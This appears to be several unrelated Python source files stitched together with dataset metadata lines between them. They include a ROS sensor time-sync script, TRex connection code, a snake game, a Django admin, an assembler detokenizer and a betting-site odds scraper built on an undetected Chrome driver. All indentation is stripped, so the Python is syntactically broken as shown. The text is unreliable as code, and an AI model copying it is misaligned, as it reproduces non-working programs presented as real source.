# Check if IMU calibration and consequently TimeSync has succeeded
if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None:
print('IMU data calibration failed. Exiting')
remote.close()
launch_subprocess.terminate()
launch_subprocess.wait()
sys.exit()
comp_delay2 = time_sync2.time_delay
M = time_sync2.M
# Compute resulting offset
sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2)
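    # The offset combines the coarse clock difference (mean of the per-sample timestamp
    # gaps between the smartphone and MCU gyro streams) with the sub-sample residual
    # delay estimated by TimeSync2, giving smartphone_time - mcu_time in seconds.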
# Show mean of omegas to visually oversee sync performance
plt.ion()
plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1))
plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--')
plt.show()
plt.pause(2)
plt.close()
# 2. Azure camera alignment
depth_cam_listener = rospy.Subscriber("/azure/depth/camera_info", CameraInfo, depth_cam_callback)
mcu_cam_listener = rospy.Subscriber("/mcu_cameras_ts", TimeReference, mcu_cam_callback)
# Send start_mcu_cam_triggering command to mcu via mcu.cpp
cam_align_subprocess = subprocess.Popen("rosrun mcu_interface start_mcu_cam_trigger_client".split())#subpr_list.append(cam_align_subprocess)
cam_align_subprocess.wait()
# Some time needed to get a camera frame and its info in mcu.cpp
time.sleep(0.1)
publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10)
global depth_cam_ts
global mcu_cam_ts
time_sleep_duration = 0.01
time_past = 0
while mcu_cam_ts == None or depth_cam_ts == None:
time.sleep(time_sleep_duration)
time_past += time_sleep_duration
if time_past == 3:
print('Timeout reached. Exiting')
mcu_cam_listener.unregister()
publisher_depth_to_mcu_offset.unregister()
depth_cam_listener.unregister()
remote.close()
sys.exit()
depth_cam_listener.unregister()
#mcu_cam_listener.unregister()
msg = TimeReference()
msg.header.frame_id = "mcu_depth_ts"
msg.header.stamp = mcu_cam_ts#[0]
msg.time_ref = depth_cam_ts#[0]
publisher_depth_to_mcu_offset.publish(msg)
print_master('Tap Enter to start recording')
raw_input()
# Start video on s10
sm_remote_ts_ns, sm_frame_period_ns = remote.start_video()
    sm_remote_ts = sm_remote_ts_ns / 1e9
sm_frame_period = sm_frame_period_ns / 1e9
# Compute mcu desired timestamp
mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset
'''
# Save some info
print "comp_delay2 ", comp_delay2
print "sm_mcu_clock_offset", sm_mcu_clock_offset
print "sm_remote_ts ", sm_remote_ts
#print "sm_frame_period ", sm_frame_period
print "np.mean(sm_gyro_time - mcu_gyro_time)", np.mean(sm_gyro_time - mcu_gyro_time)
print "sm_gyro_time[0] ", sm_gyro_time[0]
print "sm_gyro_time[-1] ", sm_gyro_time[-1]
print "mcu_gyro_time[0] ", mcu_gyro_time[0]
print "mcu_desired_ts ", mcu_desired_ts
with open("out/" + time.strftime("%b_%d_%Y_%H_%M_%S") + ".txt", "w+") as out:
out.writelines(
'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\n' + \
str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \
'\n'
)
'''
# Added for debugging
path = '/'.join( ('out', 'master', time.strftime("%m(%b)%d_%Y_%H%M%S")) )
os.mkdir(path)
#imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T)
#imu_data_frame.to_csv(
print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape)
pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv(
'/'.join( (path, 'imu_data.csv') ),
header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'],
index=False
)
#debug_data_frame = pd.DataFrame.from_dict({
pd.DataFrame.from_dict({
'comp_delay2' : [comp_delay2],
'sm_remote_ts' : [sm_remote_ts],
'sm_frame_period' :[sm_frame_period],
'mcu_desired_ts' : [mcu_desired_ts],
'sm_mcu_clock_offset' : [sm_mcu_clock_offset],
'M00' : M[0,0],
'M01' : M[0,1],
'M02' : M[0,2],
'M10' : M[1,0],
'M11' : M[1,1],
'M12' : M[1,2],
'M20' : M[2,0],
'M21' : M[2,1],
'M22' : M[2,2]
}).to_csv('/'.join( (path, 'debug_data.csv') ), index=False)
#debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False)
# Phase alignment
align_camera_subprocess = subprocess.Popen(("rosrun mcu_interface align_mcu_cam_phase_client " + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess)
align_camera_subprocess.wait()
# Some time needed to get camrera frame data by mcu.cpp
time.sleep(0.1)
# Send publish_s10_timestamp message to mcu.cpp
send_offset_subprocess = subprocess.Popen(("rosrun mcu_interface publish_s10_to_mcu_offset_client " + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess)
send_offset_subprocess.wait()
# 3. Record data
record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split())
subpr_list.append(record_subprocess)
time.sleep(1)
print_master('Recording is started')#\nPress Ctrl+C to stop recording along with everything and exit')
publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10)
#flag_to_process = True
sequence_num = 1
print_master('Current sequence number: ' + str(sequence_num))
print_master('Tap Enter to indicate the next sequence')
while True:
input = select.select([sys.stdin], [], [], 0.01)[0]
if input:
value = sys.stdin.readline().rstrip()
if (value == ""):
msg = TimeReference()
#msg.header.frame_id = "mcu_depth_ts"
msg.header.stamp = mcu_cam_ts_common
#msg.time_ref = depth_cam_ts
msg.source = str(sequence_num)
publisher_indicator.publish(msg)
sequence_num += 1
print_master('Current sequence: ' + str(sequence_num))
print_master('Tap Enter to indicate the next sequence')
time.sleep(0.01);
#remote.stop_video()
#remote.close()
#mcu_cam_listener.unregister()
#publisher_depth_to_mcu_offset.unregister()
if __name__ == '__main__':
main(sys.argv)
| 1.84375 | 2 |
scripts/automation/trex_control_plane/stl/trex_stl_lib/trex_stl_conn.py | alialnu/trex-core | 0 | 12794313 |
from .trex_stl_types import *
from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo
from .trex_stl_async_client import CTRexAsyncClient
import time
import signal
import os
############################ RPC layer #############################
############################ #############################
############################ #############################
class CCommLink(object):
"""Describes the connectivity of the stateless client method"""
def __init__(self, server="localhost", port=5050, virtual=False, client = None):
self.server = server
self.port = port
self.rpc_link = JsonRpcClient(self.server, self.port, client)
# API handler provided by the server
self.api_h = None
def get_server (self):
return self.server
def get_port (self):
return self.port
def connect(self):
return self.rpc_link.connect()
def disconnect(self):
self.api_h = None
return self.rpc_link.disconnect()
def transmit(self, method_name, params = None, retry = 0):
return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry)
def transmit_batch(self, batch_list, retry = 0):
batch = self.rpc_link.create_batch()
for command in batch_list:
batch.add(command.method, command.params, self.api_h)
# invoke the batch
return batch.invoke(retry = retry)
class Connection(object):
'''
    Manages the connection to the server.
    The connection state object describes the state of the
    connection to the server: it can be fully disconnected,
    fully connected, or marked for disconnection.
'''
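    # Rough usage sketch (port numbers are only illustrative defaults):
    #   conn = Connection({'server': '127.0.0.1', 'sync_port': 4501,
    #                      'async_port': 4500, 'virtual': False}, logger, client)
    #   if conn.connect():
    #       ...use the RPC and async channels...
    #       conn.disconnect()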
DISCONNECTED = 1
CONNECTED = 2
MARK_FOR_DISCONNECT = 3
def __init__ (self, conn_info, logger, client):
self.conn_info = conn_info
self.logger = logger
self.sigint_on_conn_lost = False
# API classes
self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1}
# low level RPC layer
self.rpc = CCommLink(self.conn_info['server'],
self.conn_info['sync_port'],
self.conn_info['virtual'],
client)
self.async = CTRexAsyncClient(self.conn_info['server'],
self.conn_info['async_port'],
client)
# save pointers
self.conn_info = conn_info
# init state
self.state = (self.DISCONNECTED, None)
def disconnect (self):
'''
disconnect from both channels
sync and async
'''
try:
self.rpc.disconnect()
self.async.disconnect()
finally:
self.state = (self.DISCONNECTED, None)
def connect (self):
'''
connect to the server (two channels)
'''
# first disconnect if already connected
if self.is_connected():
self.disconnect()
# connect
rc = self.__connect()
if not rc:
self.disconnect()
return rc
def barrier (self):
'''
executes a barrier
            when it returns, an async barrier is guaranteed
'''
return self.async.barrier()
def sync (self):
'''
fully sync the client with the server
must be called after all the config
was done
'''
return self.async.barrier(baseline = True)
def mark_for_disconnect (self, cause):
'''
            A thread-safe call: any thread can mark the current
            connection as invalid, which will require the main
            thread to reconnect.
'''
# avoid any messages handling for the async thread
self.async.set_as_zombie()
# change state
self.state = (self.MARK_FOR_DISCONNECT, cause)
# if the flag is on, a SIGINT will be sent to the main thread
# causing the ZMQ RPC to stop what it's doing and report an error
if self.sigint_on_conn_lost:
os.kill(os.getpid(), signal.SIGINT)
def sigint_on_conn_lost_enable (self):
'''
when enabled, if connection
is lost a SIGINT will be sent
to the main thread
'''
self.sigint_on_conn_lost = True
def sigint_on_conn_lost_disable (self):
'''
disable SIGINT dispatching
on case of connection lost
'''
self.sigint_on_conn_lost = False
def is_alive (self):
'''
            return True if any data has arrived from
            the server in the last 3 seconds
'''
return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) )
def is_connected (self):
return (self.state[0] == self.CONNECTED)
def is_marked_for_disconnect (self):
return self.state[0] == self.MARK_FOR_DISCONNECT
def get_disconnection_cause (self):
return self.state[1]
########## private ################
def __connect (self):
'''
connect to the server (two channels)
'''
# start with the sync channel
self.logger.pre_cmd("Connecting to RPC server on {0}:{1}".format(self.conn_info['server'], self.conn_info['sync_port']))
rc = self.rpc.connect()
if not rc:
return rc
# API sync V2
rc = self.rpc.transmit("api_sync_v2", params = self.api_ver)
self.logger.post_cmd(rc)
if not rc:
# api_sync_v2 is not present in v2.30 and older
if rc.errno() == JsonRpcErrNo.MethodNotSupported:
return RC_ERR('Mismatch between client and server versions')
return rc
# get the API_H and provide it to the RPC channel from now on
self.rpc.api_h = rc.data()['api_h']
# connect async channel
self.logger.pre_cmd("Connecting to publisher server on {0}:{1}".format(self.conn_info['server'], self.conn_info['async_port']))
rc = self.async.connect()
self.logger.post_cmd(rc)
if not rc:
return rc
self.state = (self.CONNECTED, None)
return RC_OK()
| 2.140625 | 2 |
src/Colors/__init__.py | tuantvk/pystrap | 2 | 12794314 | <gh_stars>1-10
# default color
primary = '#007bff'
secondary = '#6c757d'
success = '#28a745'
danger = '#dc3545'
warning = '#ffc107'
info = '#17a2b8'
light = '#f8f9fa'
dark = '#343a40'
white = '#ffffff'
black = '#212529'
# active color
active_primary = '#0069d9'
active_secondary = '#5a6268'
active_success = '#218838'
active_danger = '#c82333'
active_warning = '#e0a800'
active_info = '#138496'
active_light = '#e2e6ea'
active_dark = '#23272b'
active_white = '#ffffff' | 1.078125 | 1 |
classify.py | fedden/TensorFlowSiameseNeuralNetwork | 2 | 12794315 | import numpy as np
from sklearn.neighbors import KNeighborsClassifier
def classify_from_embeddings(model,
train_images,
train_labels,
test_images,
test_labels,
k=5,
distance_metric='mahalanobis',
distance_weighting='distance'):
# Create training embeddings.
train_embeddings = np.array([model.inference(b) for b in train_images])
train_embeddings = train_embeddings.reshape((-1, model.embedding_size))
# Create testing embeddings.
    test_embeddings = np.array([model.inference(b) for b in test_images])
test_embeddings = test_embeddings.reshape((-1, model.embedding_size))
# Train kNN.
classifier = KNeighborsClassifier(n_neighbors=k,
weights=distance_weighting,
algorithm='auto',
metric=distance_metric,
n_jobs=-1)
classifier.fit(train_embeddings, train_labels)
# Get predictions.
test_predictions = classifier.predict(test_embeddings)
# Return accuracy of kNN.
    accuracy = np.mean(test_predictions == test_labels)  # fraction of correctly classified test samples
return accuracy
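# Rough usage sketch (argument names are placeholders; `model` must expose
# inference(batch) and embedding_size as used above):
#
#   acc = classify_from_embeddings(model,
#                                  train_images, train_labels,
#                                  test_images, test_labels,
#                                  k=5, distance_metric='euclidean')
#   print('kNN accuracy on embeddings: %.3f' % acc)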
| 3.015625 | 3 |
Pythonsnakegame.py | MadJedi/pythonsnakegame | 0 | 12794316 | <reponame>MadJedi/pythonsnakegame<gh_stars>0
from tkinter import Tk, Canvas
import random
# Globals
WIDTH = 800
HEIGHT = 600
SEG_SIZE = 20
IN_GAME = True
# Helper functions
def create_block():
""" Creates an apple to be eaten """
global BLOCK
posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE)
posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE)
BLOCK = c.create_oval(posx, posy,
posx+SEG_SIZE, posy+SEG_SIZE,
fill="red")
def main():
""" Handles game process """
global IN_GAME
if IN_GAME:
s.move()
head_coords = c.coords(s.segments[-1].instance)
x1, y1, x2, y2 = head_coords
# Check for collision with gamefield edges
if x2 > WIDTH or x1 < 0 or y1 < 0 or y2 > HEIGHT:
IN_GAME = False
# Eating apples
elif head_coords == c.coords(BLOCK):
s.add_segment()
c.delete(BLOCK)
create_block()
# Self-eating
else:
for index in range(len(s.segments)-1):
if head_coords == c.coords(s.segments[index].instance):
IN_GAME = False
root.after(100, main)
# Not IN_GAME -> stop game and print message
else:
set_state(restart_text, 'normal')
set_state(game_over_text, 'normal')
class Segment(object):
""" Single snake segment """
def __init__(self, x, y):
self.instance = c.create_rectangle(x, y,
x+SEG_SIZE, y+SEG_SIZE,
fill="white")
class Snake(object):
""" Simple Snake class """
def __init__(self, segments):
self.segments = segments
# possible moves
self.mapping = {"Down": (0, 1), "Right": (1, 0),
"Up": (0, -1), "Left": (-1, 0)}
# initial movement direction
self.vector = self.mapping["Right"]
def move(self):
""" Moves the snake with the specified vector"""
for index in range(len(self.segments)-1):
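            # Shift each body segment into the position of the segment ahead of it;
            # the head segment is then advanced by one SEG_SIZE step along self.vector.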
segment = self.segments[index].instance
x1, y1, x2, y2 = c.coords(self.segments[index+1].instance)
c.coords(segment, x1, y1, x2, y2)
x1, y1, x2, y2 = c.coords(self.segments[-2].instance)
c.coords(self.segments[-1].instance,
x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE,
x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE)
def add_segment(self):
""" Adds segment to the snake """
last_seg = c.coords(self.segments[0].instance)
x = last_seg[2] - SEG_SIZE
y = last_seg[3] - SEG_SIZE
self.segments.insert(0, Segment(x, y))
def change_direction(self, event):
""" Changes direction of snake """
if event.keysym in self.mapping:
self.vector = self.mapping[event.keysym]
def reset_snake(self):
for segment in self.segments:
c.delete(segment.instance)
def set_state(item, state):
c.itemconfigure(item, state=state)
def clicked(event):
global IN_GAME
s.reset_snake()
IN_GAME = True
c.delete(BLOCK)
c.itemconfigure(restart_text, state='hidden')
c.itemconfigure(game_over_text, state='hidden')
start_game()
def start_game():
global s
create_block()
s = create_snake()
# Reaction on keypress
c.bind("<KeyPress>", s.change_direction)
main()
def create_snake():
# creating segments and snake
segments = [Segment(SEG_SIZE, SEG_SIZE),
Segment(SEG_SIZE*2, SEG_SIZE),
Segment(SEG_SIZE*3, SEG_SIZE)]
return Snake(segments)
# Setting up window
root = Tk()
root.title("PythonicWay Snake")
c = Canvas(root, width=WIDTH, height=HEIGHT, bg="#003300")
c.grid()
# catch key presses
c.focus_set()
game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text="GAME OVER!",
font='Arial 20', fill='red',
state='hidden')
restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3,
font='Arial 30',
fill='white',
text="Click here to restart",
state='hidden')
c.tag_bind(restart_text, "<Button-1>", clicked)
start_game()
root.mainloop()
| 3.65625 | 4 |
botbot/apps/bots/admin.py | Reception123/IRCLogBot | 5 | 12794317 | <filename>botbot/apps/bots/admin.py
"""Django admin configuration for the bot objects.
"""
import redis
from django import forms
from django.conf import settings
from django.contrib import admin
from django.forms.models import BaseInlineFormSet
from . import models
class PluginFormset(BaseInlineFormSet):
def __init__(self, *args, **kwargs):
super(PluginFormset, self).__init__(*args, **kwargs)
class ActivePluginInline(admin.StackedInline):
model = models.Channel.plugins.through
formset = PluginFormset
def get_extra(self, request, obj=None, **kwargs):
return 0
class ChatBotAdmin(admin.ModelAdmin):
exclude = ('connection', 'server_identifier')
list_display = ('__unicode__', 'is_active', 'usage')
list_editable = ('is_active',)
list_filter = ('is_active',)
readonly_fields = ('server_identifier',)
# Disable bulk delete, because it doesn't call delete, so skips REFRESH
actions = None
def usage(self, obj):
return "%d%%" % (
(obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100)
def botbot_refresh(modeladmin, request, queryset):
"""
Ask daemon to reload configuration
"""
queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL)
queue.lpush('bot', 'REFRESH')
botbot_refresh.short_description = "Reload botbot-bot configuration"
class ChannelForm(forms.ModelForm):
class Meta:
model = models.Channel
exclude = []
def clean_private_slug(self):
return self.cleaned_data['private_slug'] or None
class ChannelAdmin(admin.ModelAdmin):
form = ChannelForm
list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated')
list_filter = ('status', 'is_featured', 'is_public', 'chatbot')
prepopulated_fields = {
'slug': ('name',)
}
list_editable = ('chatbot','status',)
readonly_fields = ('fingerprint', 'created', 'updated')
search_fields = ('name', 'chatbot__server')
inlines = [ActivePluginInline]
actions = [botbot_refresh]
class PublicChannelApproval(ChannelAdmin):
def has_add_permission(self, request):
return False
def get_queryset(self, request):
qs = super(PublicChannelApproval, self).get_queryset(request)
return qs.filter(status=self.model.ACTIVE, is_public=True)
class PublicChannels(models.Channel):
class Meta:
proxy = True
verbose_name = "Pending Public Channel"
admin.site.register(PublicChannels, PublicChannelApproval)
admin.site.register(models.ChatBot, ChatBotAdmin)
admin.site.register(models.Channel, ChannelAdmin)
admin.site.register(models.UserCount)
| 2.078125 | 2 |
ixmp/tests/reporting/conftest.py | ShaiWinograd/ixmp | 0 | 12794318 | import pint
import pytest
@pytest.fixture(scope="session")
def ureg():
"""Application-wide units registry."""
registry = pint.get_application_registry()
# Used by .compat.ixmp, .compat.pyam
registry.define("USD = [USD]")
registry.define("case = [case]")
yield registry
| 1.9375 | 2 |
mmf/datasets/builders/flickr30k_retrieval/database.py | PlusLabNLP/phrase_grounding | 2 | 12794319 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import jsonlines
import torch
import random
import numpy as np
import _pickle as cPickle
class Flickr30kRetrievalDatabase(torch.utils.data.Dataset):
def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path):
super().__init__()
self._dataset_type = dataset_type
self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path)
self._metadata = {}
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, x):
self._metadata = x
def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path):
if self._dataset_type != "train":
self.imgs = []
with jsonlines.open(imdb_path) as reader:
# Build an index which maps image id with a list of caption annotations.
entries = []
imgid2entry = {}
count = 0
remove_ids = []
if test_id_path:
remove_ids = np.load(test_id_path)
remove_ids = [int(x) for x in remove_ids]
for annotation in reader:
image_id = int(annotation["img_path"].split(".")[0])
if self._dataset_type != "train":
self.imgs.append(image_id)
if self._dataset_type == "train" and int(image_id) in remove_ids:
continue
imgid2entry[image_id] = []
for sentences in annotation["sentences"]:
entries.append({"caption": sentences, "image_id": image_id})
imgid2entry[image_id].append(count)
count += 1
self._entries = entries
self.imgid2entry = imgid2entry
self.image_id_list = [*self.imgid2entry]
if self._dataset_type == "train":
with open(hard_neg_file_path, "rb") as f:
image_info = cPickle.load(f)
for key, value in image_info.items():
setattr(self, key, value)
self.train_imgId2pool = {
imageId: i for i, imageId in enumerate(self.train_image_list)
}
self.db_size = len(self._entries)
def __len__(self):
return self.db_size
def __getitem__(self, idx):
entry = self._entries[idx]
if self._dataset_type != "train":
return entry, self.imgs
image_id = entry["image_id"]
while True:
# sample a random image:
img_id2 = random.choice(self.image_id_list)
if img_id2 != image_id:
break
entry2 = self._entries[random.choice(self.imgid2entry[img_id2])]
        # another random (wrong) image
while True:
# sample a random image:
img_id3 = random.choice(self.image_id_list)
if img_id3 != image_id:
break
entry3 = self._entries[self.imgid2entry[img_id3][0]]
if self._dataset_type == "train":
# random hard caption.
rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]]
pool_img_idx = int(
rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))]
)
img_id4 = self.train_image_list[pool_img_idx]
else:
while True:
# sample a random image:
img_id4 = random.choice(self.image_id_list)
if img_id4 != image_id:
break
entry4 = self._entries[random.choice(self.imgid2entry[img_id4])]
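        # Return the matching caption plus three negatives: a caption of a random other
        # image, the first caption of another random image, and (during training) a
        # caption of a hard-negative image drawn from the precomputed train_hard_pool.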
return [entry, entry2, entry3, entry4]
| 2.125 | 2 |
Algorithms/Divide-and-Conquer/Python/main.py | KumarjitDas/Algorithms | 0 | 12794320 | <filename>Algorithms/Divide-and-Conquer/Python/main.py
from typing import List
def arraysum(array: List[int]) -> int:
""" Get the sum of all the elements in the array.
arraysum
========
The `arraysum` function takes an array and returns the sum of all of its
    elements using the divide-and-conquer method.
Parameters
----------
array: List[int]
An array/list of integers
Returns
-------
sum: int
Sum of all the elements in the array
"""
if len(array) == 0: # The base case: if the length of the
return 0 # array is 0 then stop
    return array.pop() + arraysum(array)   # Divide and conquer: split the array
                                           # into its last element and the rest,
                                           # then recurse on the remaining elements
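    # For example, arraysum([1, 2, 3]) evaluates as 3 + (2 + (1 + 0)) = 6.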
if __name__ == '__main__':
print(f"{arraysum([1, 2, 3, 4, 5, 6, 7]) = }")
| 4.34375 | 4 |
detokenizefrag.py | aycock/mh | 0 | 12794321 | <reponame>aycock/mh<filename>detokenizefrag.py
# Python < 3
# see LICENSE file for licensing information
# Partial detokenization of LISA assembler fragments found in a binary file.
import sys
TOKENS = {
# reversed by comparing assembly fragments to Mystery House disasm
# later verified against LISA decoder at
# https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp
0xcb: 'jsr',
0xca: 'jmp',
0xac: 'tax',
0xce: 'ldx',
0xcd: 'lda',
0xcf: 'ldy',
0xd2: 'sty',
0xd0: 'sta',
0x96: 'brk',
0xad: 'tay',
0x99: 'clc',
0xd1: 'stx',
0xc0: 'adc',
0xc4: 'cmp', # very likely but not 100% sure about these
0x86: 'bne',
0x87: 'beq',
# directives prepended with '.' to distinguish from assembly instrs
# names updated per LISA decoder at
# https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp
#0xd8: '.dw', # 2-byte word
0xd8: '.adr', # 2-byte word
#0xe4: '.db', # one or more hex bytes
0xe4: '.hex', # one or more hex bytes
0xdf: '.asc', # ASCII string, no terminator
}
def process():
lines = disk.split(chr(0x0d))
for line in lines:
if len(line) == 0:
# skip (XXX but can you have a line of length $d?)
continue
elif line[0] != len(line):
if line[0] < len(line) and line[line[0]] == 0x20:
# seems to happen with labels, kind of
# a two-part line
s = ''.join([ chr(b) for b in line[1:line[0]] ])
print s
line = line[line[0]+1:]
else:
# skip, probably corrupted or not part
# of assembly fragment
print '[...]'
continue
line = line[1:] # lose length byte
# opcode on line?
if line[0] & 0x80:
# opcode token and operand format byte
if line[0] in TOKENS:
print '\t' + TOKENS[line[0]],
else:
print '%02x %02x' % (line[0], line[1]),
line = line[2:]
# rest must be ASCII: operand, comment
s = ''
lastascii = True
for b in line:
if b >= ord(' ') and b < 127:
s += chr(b)
lastascii = True
else:
if lastascii == True and b & 0x80:
# high bit seems to flag the
# end of operand field when
# inline comment follows
s += chr(b & 0x7f)
lastascii = True
else:
s += ' %02x ' % b
lastascii = False
print s
if __name__ == '__main__':
if len(sys.argv) != 2:
		print 'Usage: python', sys.argv[0], '<image.dsk>'
exit()
f = open(sys.argv[1], 'rb')
disk = bytearray(f.read())
f.close()
process()
| 2.125 | 2 |
data-processing-scripts/reverse_saved_dict.py | alecokas/BiLatticeRNN-data-processing | 5 | 12794322 | """ Script for generating a reversed dictionary """
import argparse
import numpy as np
import sys
def parse_arguments(args_to_parse):
description = "Load a *.npy archive of a dictionary and swap (reverse) the dictionary keys and values around"
parser = argparse.ArgumentParser(description=description)
general = parser.add_argument_group('General options')
general.add_argument(
'-i', '--input-file', type=str, required=True,
help="The file path to the word vector dictionary into *.npy format"
)
general.add_argument(
'-o', '--output-file', type=str, required=True,
help="The target file to save the reversed dictionary"
)
args = parser.parse_args(args_to_parse)
return args
def main(args):
    wordvec = np.load(args.input_file, allow_pickle=True).item()  # allow_pickle is required for dict archives on newer NumPy
reversed_wordvec = {str(v): k for k, v in wordvec.items()}
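    # Note: values must be unique for the reversal to be lossless; if several keys share
    # the same value string, only one of them survives in the reversed dictionary.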
np.save(args.output_file, reversed_wordvec)
if __name__=='__main__':
args = parse_arguments(sys.argv[1:])
main(args)
| 3.796875 | 4 |
swf/responses/__init__.py | nstott/simpleflow | 69 | 12794323 | from .base import Response # NOQA
| 0.988281 | 1 |
bet9ja.py | kennedyC2/Arbitrage | 0 | 12794324 | <gh_stars>0
# Dependencies
# =============================================================================================================
import undetected_chromedriver.v2 as uc
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from bs4 import BeautifulSoup
import time
import json
import re
from pathlib import Path
# Browser Configurations
# =============================================================================================================
BrowserMode = uc.ChromeOptions()
BrowserMode.headless = False
BrowserMode.add_argument('--user-data-dir=./chrome_profile/')
BrowserMode.add_argument("--start-maximized")
Browser = uc.Chrome(options=BrowserMode)
actions = ActionChains(Browser)
# Websites
# =============================================================================================================
bet9ja = "https://sports.bet9ja.com/"
# Functions
# =============================================================================================================
# Bet9ja Menu
def getMenu():
# Object
data = {}
# Initialise Browser
Browser.get(bet9ja)
# Wait
WebDriverWait(Browser, 60).until(
EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item')))
# Activate Menu
Browser.find_elements(By.CLASS_NAME, "accordion-item")[0].click()
Browser.find_element(By.ID,
"left_prematch_sport-1_soccer_labelmore-toggle").click()
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
# Fetch Menu
for div in soup.select(".accordion > .accordion-item")[0]:
upper = div.select(".accordion-inner > .accordion-item")
for div in upper:
title = div.find("div", "accordion-text").get_text().strip()
id = div.find("div", "accordion-toggle")['id']
data[title] = {}
data[title]['location'] = id
# fetch Submenu and Menu link
for each in data:
l = data[each]['location']
Browser.find_element(By.ID, l).click()
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
d = soup.find_all('a', 'side-nav-league__link')
e = []
for t in d:
f = {}
f['title'] = t['title']
f['id'] = re.sub('[a-zA-Z_,]', '', t['id'])
e.append(f)
data[each]['submenu'] = e
# Save as JSON
with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile:
json.dump(data, outfile, indent=4)
Browser.quit()
# Bet9ja links
def getLinks_Bet9ja():
# web prefix
p = bet9ja + 'competition/soccer/'
# link Object
links = {}
# fetch menu
with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
for a in data[e]['submenu']:
u = e.lower().replace(',', '').replace(' ', '') + '/'
v = a['title'].lower().replace(',', '').replace(' ', '') + '/'
w = a['id'].lower()[1:]
# full link
fl = p + u + v + w
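            # e.g. ".../competition/soccer/<country>/<league>/<league-id>", built from the
            # scraped menu entries (illustrative pattern only)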
# Gather links
links[a['title']] = fl
# Save links
with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile:
json.dump(links, outfile, indent=4)
Browser.quit()
# Bet9ja Odds
# ======================================================================================
# DNB
def DNB():
# Odds
odds = []
# fetch links
with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
# Initiate Browser
Browser.get(data[e])
# Wait 5 seconds
time.sleep(5)
# Index of target
index = -1
# Get index
soup = BeautifulSoup(Browser.page_source, 'html5lib')
box = len(soup.find_all('td', 'grid-table__td'))
for i in range(box):
if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB':
index = i
break
# Activate DNB
if index > -1:
Browser.find_elements(By.CLASS_NAME,
'grid-table__td')[index].click()
# Wait 5 seconds
time.sleep(5)
# Scroll the page
height = int(Browser.execute_script(
'return document.body.scrollHeight'))
for i in range(1, height, 10):
Browser.execute_script("window.scrollTo(0, {});".format(i))
# Wait 5 seconds
time.sleep(5)
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
elem = soup.select('.sports-table > .table-f')
for each in elem:
# Compile
info = {}
home_team = each.find(
'div', 'sports-table__home').get_text().strip()
away_team = each.find(
'div', 'sports-table__away').get_text().strip()
info['category'] = e
info['match'] = home_team + ' vs ' + away_team
info['time'] = each.find('span').get_text().strip()
info['home'] = each.find_all(
'li', 'sports-table__odds-item')[0].get_text().strip() or 0
info['away'] = each.find_all(
'li', 'sports-table__odds-item')[1].get_text().strip() or 0
# Upload
odds.append(info)
else:
pass
continue
with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile:
json.dump(odds, outfile, indent=4)
Browser.quit()
# GGNG
def GGNG():
# Odds
odds = []
# fetch links
with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
